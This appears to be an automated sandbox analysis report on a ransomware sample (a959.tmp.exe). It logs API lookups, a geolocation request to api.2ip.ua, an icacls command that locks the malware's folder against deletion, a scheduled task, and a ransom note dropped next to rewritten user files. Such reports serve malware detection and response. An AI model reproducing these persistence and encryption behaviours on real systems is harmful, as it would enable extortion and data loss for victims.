Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeZoneInformation, address_out = 0x76c3465a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RaiseException, address_out = 0x76c358a6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x76c31946 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x77163002 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x76c3495d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x7715e026 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoW, address_out = 0x76c33c42 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocale, address_out = 0x76c4ce46 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLCID, address_out = 0x76c33da5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesW, address_out = 0x76cb425f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatW, address_out = 0x76c534d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatW, address_out = 0x76c4f481 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringW, address_out = 0x76c33bca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x76c317b9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x76cd7bff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x76c31328 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x77171f6e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x76cb454f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetEndOfFile, address_out = 0x76c4ce2e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x76c351b3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x76c33531 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleExW, address_out = 0x76c34a6f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x76c57aca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ReadConsoleW, address_out = 0x76cd739a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = OutputDebugStringW, address_out = 0x76c5d1d4 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleCtrlHandler, address_out = 0x76c38a09 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x77152270 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x771522b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = AreFileApisANSI, address_out = 0x76cb40d1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x76c314e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThread, address_out = 0x76c317ec True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x76c35189 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x76c314c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetEnvironmentVariableA, address_out = 0x76c3e331 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77169d35 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x76c31809 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreW, address_out = 0x76c4ca5a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x76c3179c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x76c34493 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x76c354ee True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadCursorW, address_out = 0x74f588f7 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = TranslateMessage, address_out = 0x74f57809 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = RegisterClassExW, address_out = 0x74f5b17d True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = ShowWindow, address_out = 0x74f60dfb True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = IsWindow, address_out = 0x74f57136 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CreateWindowExW, address_out = 0x74f58a29 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = UpdateWindow, address_out = 0x74f63559 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DefWindowProcW, address_out = 0x771625dd True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PeekMessageW, address_out = 0x74f605ba True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PostThreadMessageW, address_out = 0x74f58bff True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MessageBoxW, address_out = 0x74fafd3f True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DispatchMessageW, address_out = 0x74f5787b True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PostQuitMessage, address_out = 0x74f59abb True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DestroyWindow, address_out = 0x74f59a55 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SendMessageW, address_out = 0x74f59679 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetMessageW, address_out = 0x74f578e2 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptGetHashParam, address_out = 0x74d4df7e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptAcquireContextW, address_out = 0x74d4df14 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = OpenSCManagerW, address_out = 0x74d4ca64 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = OpenServiceW, address_out = 0x74d4ca4c True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptReleaseContext, address_out = 0x74d4e124 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetUserNameW, address_out = 0x74d5157a True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptHashData, address_out = 0x74d4df36 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExW, address_out = 0x74d514d6 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x74d5469d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptDestroyHash, address_out = 0x74d4df66 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = ControlService, address_out = 0x74d67144 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyExW, address_out = 0x74d5468d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptCreateHash, address_out = 0x74d4df4e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptEncrypt, address_out = 0x74d6779b True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptImportKey, address_out = 0x74d4c532 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = QueryServiceStatus, address_out = 0x74d52a86 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegQueryValueExW, address_out = 0x74d546ad True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CloseServiceHandle, address_out = 0x74d5369c True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetPathFromIDListW, address_out = 0x760617bf True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetSpecialFolderLocation, address_out = 0x7605e141 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = CommandLineToArgvW, address_out = 0x75fe9ee8 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteA, address_out = 0x76217078 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteExW, address_out = 0x75ff1e46 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoInitialize, address_out = 0x755fb636 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoInitializeSecurity, address_out = 0x75607259 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoUninitialize, address_out = 0x756286d3 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoCreateInstance, address_out = 0x75629d0b True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 202, address_out = 0x7522fd6b True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 2, address_out = 0x75224642 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 9, address_out = 0x75223eae True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 8, address_out = 0x75223ed5 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 6, address_out = 0x75223e59 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 200, address_out = 0x75223f21 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 12, address_out = 0x75225dee True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 201, address_out = 0x75224af8 True 1
Fn
Get Address c:\windows\syswow64\iphlpapi.dll function = GetAdaptersInfo, address_out = 0x74ae9263 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 12, address_out = 0x75bcb131 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 11, address_out = 0x75bc311b True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 52, address_out = 0x75bd7673 True 1
Fn
Get Address c:\windows\syswow64\dnsapi.dll function = DnsQuery_W, address_out = 0x74a9572c True 1
Fn
Get Address c:\windows\syswow64\dnsapi.dll function = DnsFree, address_out = 0x74a8436b True 1
Fn
Get Address c:\windows\syswow64\crypt32.dll function = CryptStringToBinaryA, address_out = 0x759e5d77 True 1
Fn
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x749dc544 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventExW, address_out = 0x76cb410b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreExW, address_out = 0x76cb4195 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadStackGuarantee, address_out = 0x76c3d31f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolTimer, address_out = 0x76c4ee7e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolTimer, address_out = 0x7717441c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForThreadpoolTimerCallbacks, address_out = 0x7719c50e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolTimer, address_out = 0x7719c381 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolWait, address_out = 0x76c4f088 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolWait, address_out = 0x771805d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolWait, address_out = 0x7719ca24 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushProcessWriteBuffers, address_out = 0x77150b8c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibraryWhenCallbackReturns, address_out = 0x7720fde8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessorNumber, address_out = 0x771a1e1d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalProcessorInformation, address_out = 0x76cb4761 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSymbolicLinkW, address_out = 0x76cacd11 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetDefaultDllDirectories, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesEx, address_out = 0x76cb424f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringEx, address_out = 0x76cb46b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatEx, address_out = 0x76cc6676 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoEx, address_out = 0x76cb4751 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatEx, address_out = 0x76cc65f1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLocaleName, address_out = 0x76cb47c1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocaleName, address_out = 0x76cb47e1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x76cb47f1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentPackageId, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount64, address_out = 0x76c4eee0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumProcesses, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumProcessModules, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleBaseNameW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = EnumProcesses, address_out = 0x75141544 True 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = EnumProcessModules, address_out = 0x75141408 True 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = GetModuleBaseNameW, address_out = 0x7514152c True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
System (8)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 1627-02-27 16:55:39 (UTC) True 1
Fn
Get Time type = Ticks, time = 98233 True 1
Fn
Get Time type = Performance Ctr, time = 14714523894 True 1
Fn
Get Time type = System Time, time = 1627-02-27 16:55:40 (UTC) True 1
Fn
Get Time type = Performance Ctr, time = 15353819265 True 1
Fn
Get Time type = System Time, time = 1627-02-27 16:55:45 (UTC) True 1
Fn
Get Info type = Operating System True 1
Fn
Get Info type = Operating System True 1
Fn
Environment (2)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 2
Fn
Data
Network Behavior
HTTP Sessions (1)
»
Information Value
Total Data Sent 467 bytes
Total Data Received 7.12 KB
Contacted Host Count 1
Contacted Hosts 77.123.139.189
HTTP Session #1
»
Information Value
Server Name api.2ip.ua
Server Port 443
Username -
Password -
Data Sent 467 bytes
Data Received 7.12 KB
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = https, server_name = api.2ip.ua, server_port = 443 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /geo.json True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = https://api.2ip.ua/geo.json True 1
Fn
Read Response size = 10240, size_out = 465 True 1
Fn
Data
Close Session - True 1
Fn
Process #3: icacls.exe
0 0
»
Information Value
ID #3
File Name c:\windows\syswow64\icacls.exe
Command Line icacls "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\34ab4241-89d8-4896-a0ef-745528a314bb" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:41, Reason: Child Process
Unmonitor End Time: 00:00:43, Reason: Self Terminated
Monitor Duration 00:00:01
Remark No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0x358
Parent PID 0x7b4 (c:\users\5p5nrgjn0js halpmcxz\desktop\a959.tmp.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 7FC
0x 2AC
Process #4: taskeng.exe
0 0
»
Information Value
ID #4
File Name c:\windows\system32\taskeng.exe
Command Line taskeng.exe {0E3013FB-5D32-4499-A940-035C87CD1A3B} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\5p5NrGJn0jS HALPmcxz:Interactive:Highest[1]
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:00:41, Reason: Created Scheduled Job
Unmonitor End Time: 00:01:09, Reason: Self Terminated
Monitor Duration 00:00:27
Remark No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0x50c
Parent PID 0x36c (c:\windows\system32\svchost.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 33C
0x 578
0x 574
0x 520
0x 514
0x 510
0x 82C
Process #5: a959.tmp.exe
3345 12
»
Information Value
ID #5
File Name c:\users\5p5nrgjn0js halpmcxz\desktop\a959.tmp.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\A959.tmp.exe" --Admin IsNotAutoStart IsNotTask
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:42, Reason: Child Process
Unmonitor End Time: 00:01:08, Reason: Self Terminated
Monitor Duration 00:00:26
OS Process Information
»
Information Value
PID 0x714
Parent PID 0x7b4 (c:\users\5p5nrgjn0js halpmcxz\desktop\a959.tmp.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 244
0x 5B4
0x 440
0x 6BC
0x 7B8
0x 61C
0x 35C
0x 324
0x 39C
0x B0
0x 2AC
0x 6B4
0x 4A4
0x 7CC
Dropped Files
»
Filename File Size Hash Values YARA Match Actions
C:\_readme.txt 1.14 KB MD5: 4c10e7119c2c6f076e4e0a07a7a74951
SHA1: 939b5b70e380acf48f9c4142ba11164f07f589ec
SHA256: 8ae9d4691fb07b78e6fc95f4533cb9cdb4b7ad6ed5ff8c4fc0b153d3c5b76758
SSDeep: 24:FSimHPnIekFQjhRe9bgnYLuW3atmFRqrl3W4kA+GT/kF5M2/kDwyD5oOzASeW:NmHfv0p6W3QPFWrDGT0f/k51AS1
False
C:\Boot\BOOTSTAT.DAT 64.08 KB MD5: b7f9c6136873478973c188e420cc1b23
SHA1: d4bdb184570e803d8565d8512d5ff02e5fd179eb
SHA256: 031cdde98a4025a314d7cc111b7b4c9d07739d938eccd2ad2499645caf53de0f
SSDeep: 1536:6Xix0LB4LbDIXVJZI4osF+UhRkjuSWZAuuMt:KE094LfKLi4oA+LuSWZ9t
False
C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Aclviho ASldjfl.contact 1.23 KB MD5: b3234c811c802bc2e2af4208f8fda25c
SHA1: bdd1452e79e86c6cceb69f0c89715e504ed4aba3
SHA256: 80e5a5225a7a5a533b9a40f13b536200c852fee6b808d30d3d6d9c6d6f052364
SSDeep: 24:2FzBPJU42yTuix1ajwQbNbhuGzY5hXR8IeoqfaRyR5wASesbD:2FzBPJhTxIjh/zUhB8Ierfge5wASpD
False
C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Administrator.contact 66.86 KB MD5: 29b08fef13dbdec7044276de3f6f3e05
SHA1: 11d12976faa561a82e6609ca3ed736567403fba6
SHA256: beffe810d67a97b66c79ba95d20bb349e08a3cf68d6cd252c9118c3e17ab88ac
SSDeep: 1536:NRevfh5KSk7cstpjO/zX7lVx7NH0PTfSXvCwhjAf2PS4BNxJ:bevf2VpjO7pVfH0PP6jmdeXJ
False
C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\asdlfk poopvy.contact 1.22 KB MD5: 415a095dde3dbefaab0fd359dc045f80
SHA1: 4ce38f8637625395cce5abf566eec1da9768aa9b
SHA256: b5072325100a6b858806ff64965bff6e4db5171ae3bd4a1fc213bb74f487f10a
SSDeep: 24:2FzBPJU42yTuI2Lwuk2y/sv9eKoBAczIAt1lLehMY4ZRmdE+sASesbD:2FzBPJhv2Lh4+U5khMfYdE+sASpD
False
C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\lulcit amkdfe.contact 1.22 KB MD5: 91fe2ab90204014ecd4b6f005ccf2a58
SHA1: 473b1179927be2af33b2e0fc9d208d23e0190c40
SHA256: 789f317a309bcf8e8a90f1032b76e8872f0f65813b7d3f37bee862a792254514
SSDeep: 24:2FzBPJU42yTuMIm62i+wvabNbhuGzY5hI+RU3hgchDCsjVg7CRFASesbD:2FzBPJh2mPXMg/zUhI+RfzwVmUASpD
False
C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\sikvnb huvuib.contact 1.22 KB MD5: ca2c649bc081c88505222ab7ab5126c8
SHA1: dcf7b8fe8fb402ef34eb2e8407fa7958bc8542ef
SHA256: c8e369657c8c8683fe6f666fb16f224a29e857785bda97a028348f35c74961e6
SSDeep: 24:2FzBPJU42yTuaOwP1CLXtu31rVHtDumOBX1FpuVx79rlUASesbD:2FzBPJhWHc1rlYme1PUlyASpD
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\DfM1jMQH5m.m4a 18.26 KB MD5: cba194e5860deb41a1f33b6bd61a64fc
SHA1: 76d4244387fa4cd6b66aab5f75255858ae12c6a1
SHA256: fd52271bae256f7833089ed8a7d043a88c2286c0ba49aca8b441864f2bcf3ab6
SSDeep: 384:Bs391RI8LJnvGtIn48kLOCesmnA1XF5NqpfFqk0/VMCpHqOoK+9Z2vYUsfXw:etB7yOM91X70CtzobHPw
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eCYysFOHAuDPd0.odp 84.29 KB MD5: 051a8ed133ec583430178a138ddc42e8
SHA1: 6cdac8f026fa9804330dfae5c0c4f02b518bad95
SHA256: 0937041277a6f50a733e977e726f08f4d9b446d179a066e5c56c9e19be1d8c39
SSDeep: 1536:5t+4PUde+0rfRk3EC1+NCDxPAeQy+cM3q0XtLN4QOfRJ2X0rHUBFloK:+bdhMJkUCAmxYexDMH9KQoRJpjm/
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\gl-n 26G.bmp 19.30 KB MD5: b30c317f89bbbce1c84967ded4102ca5
SHA1: b42ab67124911da41a9a9802d734cb57919fd41e
SHA256: 071d46b1a9ad6060ee27e8189c16eeb01213067e65bd46b0143bf94fd73f2de8
SSDeep: 384:cGOaiPYu9g1tX8t8uxwV83QGw3guk6gvyihdPyQW:cJCy+V83/wQx6QvHW
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\GMWkR.wav 33.08 KB MD5: 745f9fcdfc2ace4cbb458c8135bfaac3
SHA1: ea579cdde98e9d21d6d8586e7dd5ac34b113ba20
SHA256: f9886efd82d884effbb99a8b84b98847707fdd129070e82654cee8bf95dca2bd
SSDeep: 768:yTG4vZGVyYU/yQeM+FesSeZkURr+/7Hw1p5e4rnyvdB:yTxAVyYl1esCUROHYzUdB
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\I TKCX nhSV2b.mp3 15.54 KB MD5: 949627b39237805165976f98915bc827
SHA1: 5ca905a14f152546e6aeeff8e6fddc0a153e3400
SHA256: b39843dd0540b050c4f25530dba3e2f6b19f0ffe8f1f3a4adc347fab94cb15b8
SSDeep: 384:LOkhroj8V0BnhBKM2xSwqwzXetnqIw234q9VbaJbunn12m:iGkdg/qXFqIwMx4J6nwm
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\nborqaG7LbY-8nT0ByEv.pps 76.31 KB MD5: f6211b69a61d788697b1a7d7170c5c53
SHA1: fbcd5887a4299c5ec522ee914d4c0b700dd9c844
SHA256: c64d5d943bc2a34ed6c52098b991f56211a7f6ad1a138503b8f2fe876a5a8f4d
SSDeep: 1536:E/qStkJhXU8Sfx3zKgD8+vts4LxbjnoV4rzFOXkz3bGJv6bwBVK:oqSG9S53z/vt/LN06zVz3wHVK
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\nXxNQgqy6gVdEPQ.bmp 89.04 KB MD5: ddbe8e83f612837148cd81761ab54d0a
SHA1: 913a8da72e204bdac48b5a1dc9359097f122f885
SHA256: 5751d8dc329c17ef8fbda0910f8ecc2e4857e3e705342f3f759778341bb7ea2a
SSDeep: 1536:8L/FaboujQBrwGk/On6LNdooYaB/a5arIZHlK8G8:ccolaGkkooPag5vZHFG8
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\PoDqxcM TSaz.swf 77.05 KB MD5: d84213966c09a8a0908f2c0e25ff5611
SHA1: 9d8bf2bec90238cb3552148a30c1f94f98275581
SHA256: 040fdc5ec0c336f4b60d59d509bae40d7b4d683c7e9d69ba00af8517e96c3781
SSDeep: 1536:7/BQtPO7TAGSLzYJtHPyQxDo2+8LOBmkDCzzVSYeYvzmHT/eT+0FNw+bM:7ZX7TEL0JxyQho2+AOBmkDMJvzmTRs+3
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\TeVS.mp4 16.45 KB MD5: dc45a0f543f8c7a8876746b5c38bcfd5
SHA1: d4514daeed66c3d3787cdb39fcc80e0a3dfd1884
SHA256: eb85101a119dc1682fa25f31e4daf0415f49c68dea1898ecd39d4110454a80b6
SSDeep: 384:y+nK99ib1rXTBDZkT8hIogkxSPFj4NS8aVlGHe3f56XVqg:y+nK9Mbdv+SDg28p4Q8aVE+vwlt
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\TyHbSH6VrF3xX.mp3 82.00 KB MD5: 608a336b0f3cc813baae25ab46142920
SHA1: a66614bbd2ec6bc2af2a667e2392dabf2ca40e6f
SHA256: 168dc09a88d99b9910fe68669792634baad287e3b894ccf174ac8101b344f654
SSDeep: 1536:/uS56lsCliaJku3/nJG0qJ5TIILFQbWh8qF5ifeKbk2L/j69MJz83xpB6:K22X5vnJKJ5MILJEeCk2LuWd8t6
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\uVeSXOWXfi_KaHM6.swf 91.30 KB MD5: fae0bb4268e7ff66a8395054a5f2167a
SHA1: cb55af92cf54ce09ed4c9c284c85f3b47c2a092f
SHA256: 4bee85e6c3469bcc5ae522ec3595aba7622f3213e8b88769ef6996d5408a8e4f
SSDeep: 1536:5Ki4M0awcsuqGFXAneXoEmkocA/rjLepEW24Y77PalIGVpA88U5zw2nbUm:ciT0aDqM3XdirjLPWrO7P0IMi88882nJ
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\uVgxMcsEjpWpZrN.jpg 22.86 KB MD5: e9d3dcc86f7116f6b6cf1325d69e0e92
SHA1: 36eb4060e5d974608ef64d4196484b7cc02fe711
SHA256: 384b039e84f956c8090bd6fe20129f71cab80bfd3d239dce6b6872ed59874a21
SSDeep: 384:eetE3s8YdVF68BbqFcXs/NyLR5ILrYOXIscKFR5GVjbxY9Ae/JKUIW61h7F:eet2s8Y5BbqFm/gQOXMw4ZSVJj6r5
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\wjaMa6Mk-99x.gif 79.98 KB MD5: 9b0f4fa12b7c59db64edb8f51917e4f4
SHA1: 012ba476fb26a6641fcfcbea2f36165c45f76396
SHA256: 20a2c6edf857105a72e0c204dade8590559c1bc1bbd1d0e2364f242b5f586095
SSDeep: 1536:45EKgNo6YUs31XbrCd5bgZP840h/HX/jLmMOZJcPp:eEW6YrCdZgl8p93OMOZJ2p
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Xk2XWRW.flv 38.32 KB MD5: 1ccfb8c19cf0f38ae18758d3c5e31f45
SHA1: 7809a612326cb04e1cdfe83c0d41d4e56103ce3c
SHA256: c78e298432f37dfe7ff741bd2bba0c5062d86983d74f3d37c31e8a7f43d8aca1
